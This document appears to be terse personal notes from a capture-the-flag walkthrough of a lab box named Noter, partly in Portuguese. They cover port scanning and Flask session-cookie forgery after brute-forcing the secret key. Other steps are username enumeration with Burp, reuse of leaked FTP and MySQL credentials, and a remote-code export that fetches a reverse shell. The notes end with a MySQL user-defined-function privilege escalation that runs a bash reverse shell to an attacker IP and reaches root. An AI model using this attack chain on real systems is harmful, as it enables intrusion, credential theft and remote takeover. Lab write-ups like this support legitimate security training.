sudo nmap -sC -sV -oA nmap/noter 10.10.11.160 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 21:48 BST
Nmap scan report for 10.10.11.160
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c6:53:c6:2a:e9:28:90:50:4d:0c:8d:64:88:e0:08:4d (RSA)
|   256 5f:12:58:5f:49:7d:f3:6c:bd:9b:25:49:ba:09:cc:43 (ECDSA)
|_  256 f1:6b:00:16:f7:88:ab:00:ce:96:af:a6:7e:b5:a8:39 (ED25519)
5000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-title: Noter
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.69 seconds


gobuster dir -u http://10.10.11.160:5000/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt 


/login                (Status: 200) [Size: 1963]
/register             (Status: 200) [Size: 2642]
/logout               (Status: 302) [Size: 218] [--> http://10.10.11.160:5000/login]
/dashboard            (Status: 302) [Size: 218] [--> http://10.10.11.160:5000/login]
/notes                (Status: 302) [Size: 218] [--> http://10.10.11.160:5000/login]
/VIP                  (Status: 302) [Size: 218] [--> http://10.10.11.160:5000/login]


cookie: eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiZ2xybiJ9.Ynf4YA.NDfrmvCC_acbxxVJ_fc8Pz2hzzY


./flask-unsign --unsign --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiZ2xybiJ9.Ynl6HQ.J17i8dTLVQ1K2vvWRis8Xnsehns'
[*] Session decodes to: {'logged_in': True, 'username': 'glrn'}
[*] No wordlist selected, falling back to default wordlist..
[*] Starting brute-forcer with 8 threads..
[*] Attempted (1920): -----BEGIN PRIVATE KEY-----***
[+] Found secret key after 16768 attemptsbcdefab56c7d
'secret123'


quando tenta logar em um usuario mas n tem a senha se tem essa msg: 'Invalid login'

burp > intruder

add $$ no username

payload /usr/share/seclists/Usernames/cirt-default-usernames.txt

salvas o responder 

grep -iR "Invalid login"

519:  <div class="alert alert-danger">Invalid login</div>

ver no burp o usuario 519

"blue"

./flask-unsign --sign --cookie "{'logged_in': True, 'username': 'blue'}" --secret 'secret123'


Your username is 'blue' and the password is 'blue@Noter!'.

baixar o pdf 

ftp_admin

ftp_admin@Noter!

baixar os zip

cat app.py

app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'Nildogg36'
app.config['MYSQL_DB'] = 'app'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'

http://10.10.11.160:5000/export_note

Export directly from cloud

url=http://10.10.14.122:8000/shell.md

https://resh.vercel.app/10.10.14.122:4444


/opt/backup.sh

https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf

create table foo(line blob);
insert into foo values(load_file('/home/svc/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('bash -c "bash -i >& /dev/tcp/10.10.14.122/4444 0>&1"');


id
uid=0(root) gid=0(root) groups=0(root)
root@noter:/root# 
